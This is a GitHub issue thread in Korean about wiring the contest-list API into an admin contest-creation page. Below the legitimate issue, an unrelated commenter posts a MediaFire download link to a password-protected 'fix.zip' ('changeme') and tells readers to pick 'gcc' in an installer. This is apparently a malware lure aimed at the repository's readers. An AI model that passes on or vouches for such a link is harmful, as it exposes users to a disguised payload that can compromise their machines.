### ISSUE TITLE
어드민 대회생성 페이지 대회리스트 api 연결

### ISSUE THREAD

**Issue by seonghoon07** [Team-INSERT/IOJ_WEB#65]
### ✨ 개요

어드민페이지의 대회리스트 api를 연결하겠습니다

### ✅ 해야 할 일

- [x] 어드민 페이지 대회리스트 퍼블리싱
- [x] 어드민 페이지 대회리스트 api 연결

### 🙋🏻 덧붙일 말

아자아자

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
